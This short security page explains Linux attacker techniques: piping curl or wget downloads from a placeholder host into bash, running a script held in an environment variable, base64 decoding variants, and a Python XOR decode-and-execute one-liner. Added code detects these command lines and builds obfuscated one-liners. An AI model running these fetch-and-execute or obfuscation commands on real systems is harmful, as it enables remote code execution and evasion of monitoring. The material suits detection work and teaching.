How an attacker can use the system environment

7/29/2025, 1 min read

-- Using curl or wget to download a script and pipe it straight into bash, so nothing is written to disk

curl -sS https://xxxx.sh | bash

wget --quiet -O - https://xxxx.sh | bash

-- An adversary may place a script in an environment variable because they can't, or don't wish to, create script files on the host

export ART='echo "payload"'

echo $ART |/bin/sh

-- Base64 decoding with shell utilities. Use common shell utilities to decode a base64-encoded text string and echo it to the console; each variant below produces the same plaintext

ENCODED=$(echo '#{message}' | base64)

printf $ENCODED | base64 -d

echo $ENCODED | base64 -d

echo $(echo $ENCODED) | base64 -d

echo $ENCODED > #{encoded_file} && base64 -d #{encoded_file}

echo $ENCODED > #{encoded_file} && base64 -d < #{encoded_file}

echo $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d

echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d

bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}"
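All three techniques above (download-and-pipe, a script held in an environment variable, a base64-decoded payload) leave the same evidence: a process command line. The Python below is an added example, not code from the original page. It runs a few constructed command-line records through one pattern check per technique and decodes any base64 token it finds so the hidden payload is visible to the analyst. The record list, the label names and the regular expressions are the example's own assumptions; the URL used is a reserved `.invalid` name.

```python
import base64
import re

# Constructed sample process-execution records (the shape you would get from
# auditd EXECVE events or an EDR command-line feed). Made up for this example.
SAMPLE_CMDLINES = [
    "curl -sS https://example.invalid/x.sh | bash",
    "wget --quiet -O - https://example.invalid/x.sh | bash",
    "echo $ART |/bin/sh",
    "echo aWQgLXU= | base64 -d",
    'bash -c "{echo,\\"aWQgLXU=\\"}|{base64,-d}"',
    "ls -la /tmp",
]

# One deliberately narrow pattern per technique on the page.
DOWNLOAD_PIPE = re.compile(r"\b(curl|wget)\b.*\|\s*(/bin/)?(ba)?sh\b")
ENV_TO_SHELL = re.compile(r"echo\s+\$\{?\w+\}?\s*\|\s*(/bin/)?(ba)?sh\b")
BASE64_DECODE = re.compile(r"base64[ ,]+(-d|--decode)\b")
# Anything that looks like a base64 blob (6+ alphabet chars, optional padding).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{6,}={0,2}")


def decode_b64_args(cmdline):
    """Return the printable plaintext of every valid base64 token in cmdline.

    Ordinary words also match B64_TOKEN, so strict decoding plus a
    printable-bytes check is what separates real payloads from noise."""
    found = []
    for tok in B64_TOKEN.findall(cmdline):
        try:
            raw = base64.b64decode(tok, validate=True)
        except Exception:
            continue  # wrong length/padding: not a base64 blob
        if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
            found.append(raw.decode())
    return found


def classify(cmdline):
    """Return the technique labels that match one command line."""
    hits = []
    if DOWNLOAD_PIPE.search(cmdline):
        hits.append("download-and-pipe-to-shell")
    if ENV_TO_SHELL.search(cmdline):
        hits.append("env-var-script-to-shell")
    if BASE64_DECODE.search(cmdline):
        hits.append("base64-decode")
    return hits


def scan(cmdlines):
    """Return (cmdline, labels, decoded_payloads) for each suspicious record."""
    findings = []
    for line in cmdlines:
        labels = classify(line)
        if labels:
            findings.append((line, labels, decode_b64_args(line)))
    return findings


if __name__ == "__main__":
    for line, labels, payloads in scan(SAMPLE_CMDLINES):
        print(f"{labels} {line!r} decoded={payloads}")
```

The brace-expansion form `{echo,...}|{base64,-d}` is caught because the `base64` regex tolerates a comma as well as a space between the binary and its flag; if you tune these patterns for production, keep that variant in your test set, since it is the one most likely to slip past a naive `base64 -d` string match.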

-- XOR decoding and command execution using Python. An adversary can obfuscate a malicious command by XOR-ing it with a repeating key and base64-encoding the result, then decode and execute it on the victim's machine in a single python3 invocation, so the plaintext command appears neither on disk nor in the process command line

python3 -c 'import base64; import subprocess; from itertools import cycle; xor_decrypt = lambda text, key: "".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()), cycle(key))]); command = "#{encrypted_command}"; key = "#{xor_key}"; cmd = xor_decrypt(command, key); subprocess.call(cmd, shell=True)'
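The one-liner above only decodes. To produce a matching `#{encrypted_command}` for a given `#{xor_key}`, and to see why the key length matters, the following Python is an added example, not code from the original page. It implements the encoder, a decoder written with a plain `zip()` over the key (which stops at the shorter sequence and therefore truncates when the key is shorter than the payload), the repeating-key decoder that works for any key length, and a function that renders the one-liner with the placeholders filled in. Nothing here executes the rendered command; the sample command and key are constructed.

```python
import base64
from itertools import cycle


def xor_encrypt(command: str, key: str) -> str:
    """Build the base64 blob the one-liner expects: command XOR repeating key."""
    raw = bytes(c ^ ord(k) for c, k in zip(command.encode(), cycle(key)))
    return base64.b64encode(raw).decode()


def xor_decrypt_truncating(text: str, key: str) -> str:
    """Decoder with a plain zip() over the key.

    zip() stops at the shorter input, so a key shorter than the payload
    silently drops everything past len(key) bytes."""
    return "".join(chr(c ^ ord(k))
                   for c, k in zip(base64.b64decode(text.encode()), key))


def xor_decrypt(text: str, key: str) -> str:
    """Repeating-key decoder; correct for any key length."""
    return "".join(chr(c ^ ord(k))
                   for c, k in zip(base64.b64decode(text.encode()), cycle(key)))


def build_one_liner(encrypted_command: str, xor_key: str) -> str:
    """Render the python3 -c command with both placeholders filled in.

    Returned as a string only; it is never run here. The key must not
    contain a single quote, since the shell wraps the body in one."""
    body = (
        "import base64; import subprocess; from itertools import cycle; "
        'xor_decrypt = lambda text, key: "".join([chr(c ^ ord(k)) for c, k in '
        "zip(base64.b64decode(text.encode()), cycle(key))]); "
        f'command = "{encrypted_command}"; key = "{xor_key}"; '
        "subprocess.call(xor_decrypt(command, key), shell=True)"
    )
    return f"python3 -c '{body}'"


# Constructed sample values for the example.
SAMPLE_COMMAND = "echo 'hello from xor'"
SAMPLE_KEY = "k3y"

if __name__ == "__main__":
    enc = xor_encrypt(SAMPLE_COMMAND, SAMPLE_KEY)
    print("encrypted_command:", enc)
    print("repeating-key decode:", xor_decrypt(enc, SAMPLE_KEY))
    print("plain zip decode:    ", xor_decrypt_truncating(enc, SAMPLE_KEY))
    print(build_one_liner(enc, SAMPLE_KEY))
```

The rendered command line carries only the base64 blob and the key, which is the point of the technique from the attacker's side: a string match on the plaintext command will not fire on the process command line, and detection has to key on the decode-and-`subprocess` shape instead.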